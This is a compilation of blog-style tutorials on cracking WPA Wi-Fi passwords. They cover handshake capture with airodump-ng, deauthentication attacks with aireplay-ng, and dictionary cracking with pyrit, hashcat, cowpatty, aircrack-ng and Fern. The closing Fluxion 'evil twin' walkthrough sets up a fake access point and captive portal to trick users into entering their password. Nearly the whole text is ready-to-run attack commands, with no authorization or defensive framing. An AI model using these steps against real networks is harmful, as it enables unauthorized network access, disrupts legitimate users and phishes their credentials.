3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First start the monitor mode on our wireless adaptor .

airmon-ng start wlan0

Now the monitor mode is enabled with name wlan0mon.

and then with the following command start listening to all the available wifi connections:

airodump-ng wlan0mon

After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.

Now we have to listen to a specific channel on which the target is present . Now run command:

airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon

-c == channel number of the target (2 in my case , see the CH column)

–bssid == MAC address of the target AP

–write == name of the capture file

Now wait till the WPA handshake is captured and then hit crtl^c.

Now a file named sommay-01.cap will be generated

PYRIT

First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file in our case  it is the path to dictionary

-r ==  path to the captured fle which ( in our case it is sommay-01.cap)

attack_passthrough == this options is to specify that a dictionary attack is to be performed

As you can see it has successfully cracked the password.

OCLHASHCAT

First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng previously  to .hccap with aircrack-ng  by command:

aircrack-ng sommay-01.cap -J sommay-01

-J == the path to the output file with extension .hccap

Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In above command if you are using 32 bit system replace 64 with 32.

-m is the hash type  which is 2500 for WPA/WPA2 cracking

then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password.

COWPATTY

For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID(Name) of the target AP(The name should be identical to the target AP)

Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.

Now run command :

cowpatty  -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP(The name should be identical to the target AP)

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

Crack Wifi Password using Aircrack-Ng (Beginner’s Guide)

This is the classical method of wireless password cracking .All the tools use this method in one way or other.

First start the monitor mode which will listen to all the wifi connections nearby with command:

airmon-ng start wlan0

In your lower right corner you will see written. monitor mode enabled for [phy1]wlan0mon

Now run the following command to confirm that our wifi adaptor is in monitor mode, so run command:

ifconfig

which will show you the wifi adaptor as wlan0mon meaning adaptor is in monitor mode.

Now run command:

airodump-ng wlan0mon

The above command will start listening to all the available wifi connections.

Now when your target appeas hit ctrl^c and then to capture the handshake type command:

airodump-ng -c 7 –bssid C8:XX:35:XX:FD:F0  –write 1 wlan0mon

Here,

 -c is the channel no. of the AP which will be listed in CH column in the output of above command as in my case it is 7.

–bssid is the MAC address of the target AP as in my case it is rajlab and bssid is  C8:3A:XX:44:XX:F0

–write is the capture file in which the capture packets will be saved as in my case i have named it as 1

Option Description
-c The channel for the wireless network
–bssid The MAC address of the access point
-w The file name prefix for the file which will contain authentication handshake
mon0 The wireless interface

Now start the deauth attack to disconnect all the connected clients to that AP which will help in capturing the handshake with command:

aireplay-ng -0 100 –a XX:3A:35:XX:FD:F0  -e rajlab wlan0mon

Here,

-0 is used for deauth attack

100 is no. of deauth packets to be sent

-a is the target AP MAC address

-e is ESSID of the target AP i.e. name of the target AP 

After launching the deauth attack we will get the WPA handshake in the previous terminal window in the top right corner then hit ctrl^c.

Now we have to crack the password with aircrack-ng so type command :

aircrack-ng 1-01.cap –w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture file we generated in the airodump-ng .

-w is the dictionary to be used to perform dictionary attack

In my case the key is found as KEY FOUND! [raj123987]

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

Cracking WiFi Password using Fern WIFi Cracker

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern comes preinstalled in the kali linux , so go to Applications and then to Wireless attack and then click on fern wifi cracker.

Now click on select interface and select the wireless interface which will put it into monitor mode to listen to all the wifi AP’s nearby. Now click on Scan for Access points.

After scanning it will show the WEP and WPA secured wifi separately but in my case there is no WEP so it is showing  5 WPA secured wifi  so click on WPA tab. 

Now it will show all the WPA wifi and select your target by clicking on it as in my case I have selected ttpl as my target and now select dictionary by clicking on BROWSE on lower right hand corner.  

Now select your dictionary from your system .I has selected nmap.lst from /usr/share/wordlists/ directory and then click on open. (YOU CAN USE YOUR CUSTOM MADE WORDLIST OR ANY OTHER)

Now select Regular attack and then click on WIFI ATTACK on top right hand corner.

Now it will prompt with WPA ATTACK REQUIREMENT as at least 1 client is required to be connected to the target AP, so click OK on it.

Clicking on OK will start the attack by first deauthenticating the client and then capturing handshake and then breaking the encryption which will lead to successful breaking of the password if it is present in your dictionary. In my case it has successfully found my password as WPA KEY:rajchandel12345

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)

Fluxion is a remake of linset by vk439 with less bugs and more features. It’s compatible with the latest release of Kali (Rolling).

How it works

  • Scan the networks.
  • Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
  • Use WEB Interface *
  • Launch a Fake AP instance to imitate the original access point
  • Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
  • A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
  • Each submitted password is verified by the handshake captured earlier
  • The attack will automatically terminate, as soon as a correct password is submitted.

First  of all clone Fluxion from github with command :

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with command:

./fluxion

After starting it will ask for choosing the interface so select wlan0 by ENTERING 1 and then it will ask you to select the channel to listen to wifi connections so enter 1 to listen to all wifi connections.

It will open a new window for wifi monitoring so wait till your target appears and hit ctrl^c.

Now it will show the list of available targets so select the target by pressing the id no. of that connection as in my case i have selected ttpl by press 2.

Now select option 1 for creating fake AP (access point) and press ENTER.

Now press ENTER to skip and then select 1 for choosing aircrack-ng from handshake checking options.

Now select option 1 to Deauthenticate all clients connected to the target wifi

After selecting 1 it will open 2 windows, one for capturing WPA handshake and other for deauthenticate all clients. Now enter 1 on the MENU window to check handshake without closing the other windows.

After checking handshake it will ask for choosing the Web Interface, so select 1 and press ENTER.

Now it will ask for choosing the language, so select 1 for ENGLISH and press ENTER.

Now it will open 4 windows starting the fake AP and deauthenticating the clients of the wifi network.

Now the fake AP is started and the clients will not be able to connect to the original wifi and will be forced to connect to our fake AP and when the client will open a browser it will be redirected to a login page asking for the WPA password

When the user will enter the correct WPA password all the attacks will be stopped and the password will be shown as in my case KEY FOUND [rajchandel12345].(ATTACKS WILL ONLY  STOP WHEN THE CLIENT WILL ENTER CORRECT PASSSWORD)

Related Posts Plugin for WordPress, Blogger...